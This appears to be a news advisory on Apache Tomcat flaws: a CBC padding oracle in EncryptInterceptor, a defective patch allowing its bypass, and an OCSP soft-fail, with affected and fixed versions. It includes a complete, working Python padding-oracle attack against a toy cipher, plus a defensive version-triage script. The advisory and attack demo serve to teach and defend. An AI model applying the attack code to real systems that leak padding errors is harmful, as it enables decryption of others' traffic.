Apache Tomcat Vulnerabilities Enable Bypass of EncryptInterceptor
Cybersecurity News, archived Apr 13, 2026
The Apache Software Foundation has released emergency security updates addressing multiple vulnerabilities in Apache Tomcat.
The advisories cover a defective patch that left the EncryptInterceptor open to a complete bypass, the padding-oracle weakness that patch was meant to fix, and an OCSP soft-fail error that affects client certificate authentication.
Administrators should update their deployments immediately to close these issues before they are exploited.
EncryptInterceptor Bypass and Padding Oracle Attacks
The most pressing issue stems from a flawed security patch. The sequence began with CVE-2026-29146, rated “Important”, in the EncryptInterceptor, the Tribes channel interceptor that encrypts Tomcat cluster traffic between nodes: it used Cipher Block Chaining (CBC) mode by default.
CBC on its own provides no integrity protection, so an attacker who can submit modified ciphertext to a cluster member and observe whether the padding check succeeds (through a distinct error or timing difference) has a padding oracle, and can use it to decrypt intercepted cluster traffic block by block without ever learning the key.
Oligo Security researchers Uri Katz and Avi Lumelsky identified and reported this initial cryptographic weakness. To resolve the padding oracle threat, Apache released an initial round of updates.
However, the fix introduced a new, equally severe vulnerability tracked as CVE-2026-34486.
Identified by Bartlomiej Dmitruk from striga.ai, this subsequent flaw allowed attackers to bypass the EncryptInterceptor completely.
Because that patch was defective, organizations that moved to the interim releases carrying it (11.0.20, 10.1.53 and 9.0.116, listed below) are not protected: they are exposed to the bypass instead.
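The padding oracle described above, as an added example that is not Tomcat's code or the researchers' proof of concept. A toy 16-byte Feistel cipher stands in for AES so the script runs offline; that substitution does not change the attack, which uses nothing but the block size and the oracle's accept/reject answer. The key, IV and message are constructed values, and the `padding_oracle` function is a stand-in for a cluster member that leaks whether padding parsed.

```python
"""Added example, not Tomcat or Apache code: a CBC padding-oracle attack.
A toy Feistel cipher (SHA-256 round function) replaces AES so this runs offline;
the attack never touches the cipher, only the oracle and the block size, which is
why padded CBC without integrity protection, not the cipher, is the weakness.
KEY, IV and MESSAGE are constructed demo values."""
import hashlib

BLOCK = 16
KEY = b"constructed-demo-key-not-secret!"   # hypothetical cluster key
IV = bytes(range(BLOCK))                     # fixed IV keeps the demo deterministic
MESSAGE = b"constructed cluster message: session replicated"

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(half: bytes, key: bytes, i: int) -> bytes:
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def block_encrypt(block: bytes, key: bytes = KEY) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):                       # 4-round Feistel network, 16-byte block
        l, r = r, _xor(l, _round(r, key, i))
    return l + r

def block_decrypt(block: bytes, key: bytes = KEY) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(l, key, i)), l
    return l + r

def pad(data: bytes) -> bytes:               # PKCS#5/#7 padding, as in AES/CBC/PKCS5Padding
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")      # this distinguishable failure is the oracle
    return data[:-n]

def cbc_encrypt(plaintext: bytes, key: bytes = KEY, iv: bytes = IV) -> bytes:
    data, prev, out = pad(plaintext), iv, b""
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(_xor(data[i:i + BLOCK], prev), key)
        out += prev
    return iv + out                          # IV travels in front of the ciphertext

def cbc_decrypt(ciphertext: bytes, key: bytes = KEY) -> bytes:
    if len(ciphertext) % BLOCK or len(ciphertext) < 2 * BLOCK:
        raise ValueError("bad length")
    out = b""
    for i in range(BLOCK, len(ciphertext), BLOCK):
        out += _xor(block_decrypt(ciphertext[i:i + BLOCK], key), ciphertext[i - BLOCK:i])
    return unpad(out)

def padding_oracle(ciphertext: bytes) -> bool:
    """Stand-in for a cluster member that reveals whether the padding parsed."""
    try:
        cbc_decrypt(ciphertext)
        return True
    except ValueError:
        return False

def padding_oracle_attack(ciphertext: bytes, oracle=padding_oracle) -> bytes:
    """Recover the plaintext using only the oracle; KEY is never read here."""
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    recovered = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)             # D_k(target), learned right to left
        for pos in range(BLOCK - 1, -1, -1):
            padlen = BLOCK - pos
            forged = bytearray(BLOCK)        # attacker-controlled "previous block"
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ padlen   # make known bytes decrypt to padlen
            for guess in range(256):
                forged[pos] = guess
                if not oracle(bytes(forged) + target):
                    continue
                if pos == BLOCK - 1:         # rule out an accidental 0x02 0x02 match
                    forged[pos - 1] ^= 1
                    still_valid = oracle(bytes(forged) + target)
                    forged[pos - 1] ^= 1
                    if not still_valid:
                        continue
                inter[pos] = guess ^ padlen
                break
            else:
                raise RuntimeError("oracle never accepted a padding")
        recovered += _xor(bytes(inter), prev)  # P_i = D_k(C_i) XOR C_{i-1}
    return unpad(recovered)

def demo() -> bytes:
    return padding_oracle_attack(cbc_encrypt(MESSAGE))
```

Running `demo()` returns `MESSAGE` after a few thousand oracle queries, none of which involve the key. The general countermeasure is to give the attacker no padding signal at all: authenticate the ciphertext (an AEAD mode, or a MAC verified before any decryption) and reject it uniformly on failure. Which change Tomcat's own patch made is not stated in this advisory.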
Alongside the EncryptInterceptor issues, Apache addressed CVE-2026-34500, rated “Moderate”, in Tomcat's Online Certificate Status Protocol (OCSP) checks.
When the Foreign Function and Memory (FFM) API is in use (Tomcat uses it for its OpenSSL integration), OCSP validation could under specific conditions soft-fail, that is, treat an unobtainable or failed revocation answer as a pass, even where the administrator had explicitly disabled soft-failing.
As a result, CLIENT_CERT authentication does not reject a client certificate whose revocation status could not be confirmed, so access controls that rely on that check behave unexpectedly.
Haruki Oyama from Waseda University discovered and reported the certificate validation error (CVE-2026-34500).
The vulnerabilities affect multiple Tomcat branches. The defective patch that allows the EncryptInterceptor bypass (CVE-2026-34486) is present in exactly these releases:
Apache Tomcat 11.0.20
Apache Tomcat 10.1.53
Apache Tomcat 9.0.116
The other vulnerabilities, the padding oracle (CVE-2026-29146) and the OCSP validation failure (CVE-2026-34500), affect a wider range of versions:
Apache Tomcat 11.0.0-M1 through 11.0.20
Apache Tomcat 10.1.0-M1 through 10.1.53
Apache Tomcat 9.0.13 through 9.0.116
To resolve all three vulnerabilities, including the flawed EncryptInterceptor patch and the OCSP certificate validation failure, administrators must upgrade their systems to the latest secure releases.
The Apache Software Foundation strongly recommends applying the following updates:
Upgrade Apache Tomcat 11.x deployments to version 11.0.21 or later
Upgrade Apache Tomcat 10.x deployments to version 10.1.54 or later
Upgrade Apache Tomcat 9.x deployments to version 9.0.117 or later
Organizations running older, End-of-Life (EOL) versions of Tomcat should migrate to a supported branch immediately, as these legacy systems will not receive patches for the padding oracle attack or subsequent bypass flaws.
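To turn the version lists above into a repeatable check, here is an added example (not Apache's tooling) that classifies a Tomcat version against the advisory's ranges and scans a server.xml for EncryptInterceptor use. The ranges are copied from this advisory; the `catalina.sh version` output and the server.xml are constructed samples. The `encryptionAlgorithm` attribute name and its CBC default are taken from Tomcat's cluster interceptor documentation and are assumptions of this script, as is the status vocabulary it prints.

```python
"""Added example, not Apache tooling: triage a Tomcat host against the version
ranges in this advisory and flag EncryptInterceptor use in server.xml.
Ranges come from the advisory text; command output and server.xml are constructed.
The encryptionAlgorithm attribute and its CBC default follow Tomcat's cluster docs."""
import re
import xml.etree.ElementTree as ET

ENCRYPT_INTERCEPTOR = "org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"

# branch -> (first affected, release carrying the defective patch, first fixed release)
RANGES = {
    "11.0": ("11.0.0-M1", "11.0.20", "11.0.21"),
    "10.1": ("10.1.0-M1", "10.1.53", "10.1.54"),
    "9.0": ("9.0.13", "9.0.116", "9.0.117"),
}

ACTIONS = {  # hypothetical status labels used by this script
    "vulnerable-bypass": "upgrade now: this release carries the defective patch (CVE-2026-34486)",
    "vulnerable": "upgrade: affected by CVE-2026-29146 and CVE-2026-34500",
    "fixed": "none: at or above the fixed release",
    "eol-branch": "migrate to a supported branch: no fix will be published",
    "pre-range": "below the affected range but far out of date: upgrade",
}

def parse_version(v: str) -> tuple:
    """'10.1.0-M5' -> (10, 1, 0, 0, 5); '10.1.0' -> (10, 1, 0, 1, 0), so milestones sort first."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-M(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {v!r}")
    major, minor, patch, milestone = m.groups()
    return (int(major), int(minor), int(patch), 0 if milestone else 1, int(milestone or 0))

def version_from_catalina_output(text: str) -> str:
    """Pull the version out of 'catalina.sh version' output ('Server version: Apache Tomcat/x.y.z')."""
    m = re.search(r"Apache Tomcat/(\S+)", text)
    if not m:
        raise ValueError("no 'Server version: Apache Tomcat/...' line found")
    return m.group(1)

def classify(version: str) -> str:
    t = parse_version(version)
    branch = f"{t[0]}.{t[1]}"
    if branch not in RANGES:
        return "eol-branch"
    first, bypass_release, fixed = RANGES[branch]
    if t >= parse_version(fixed):
        return "fixed"
    if t == parse_version(bypass_release):
        return "vulnerable-bypass"
    if t >= parse_version(first):
        return "vulnerable"
    return "pre-range"

def encrypt_interceptor_algorithms(server_xml: str) -> list:
    """encryptionAlgorithm of each EncryptInterceptor; documented default applies when omitted."""
    return [el.get("encryptionAlgorithm", "AES/CBC/PKCS5Padding")
            for el in ET.fromstring(server_xml).iter("Interceptor")
            if el.get("className") == ENCRYPT_INTERCEPTOR]

def triage(version: str, server_xml: str) -> dict:
    status = classify(version)
    algos = encrypt_interceptor_algorithms(server_xml)
    return {
        "version": version,
        "status": status,
        "action": ACTIONS[status],
        "encrypt_interceptor_in_use": bool(algos),   # only such nodes expose the interceptor path
        "cbc_in_use": any("/CBC/" in a.upper() for a in algos),
    }

# Constructed samples standing in for real command output and configuration.
SAMPLE_VERSION_OUTPUT = "Server version: Apache Tomcat/10.1.53\n"
SAMPLE_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Engine name="Catalina" defaultHost="localhost">
      <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster">
        <Channel className="org.apache.catalina.tribes.group.GroupChannel">
          <Interceptor className="org.apache.catalina.tribes.group.interceptors.EncryptInterceptor"
                       encryptionKey="placeholder-key-value"/>
        </Channel>
      </Cluster>
    </Engine>
  </Service>
</Server>"""

def demo() -> dict:
    return triage(version_from_catalina_output(SAMPLE_VERSION_OUTPUT), SAMPLE_SERVER_XML)

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On the constructed sample the result is `vulnerable-bypass` with `cbc_in_use` true, since the interceptor is declared without an explicit algorithm. Note that the version check alone is what matters for CVE-2026-34500: the OCSP issue has nothing to do with clustering, so a node with no EncryptInterceptor still needs the upgrade.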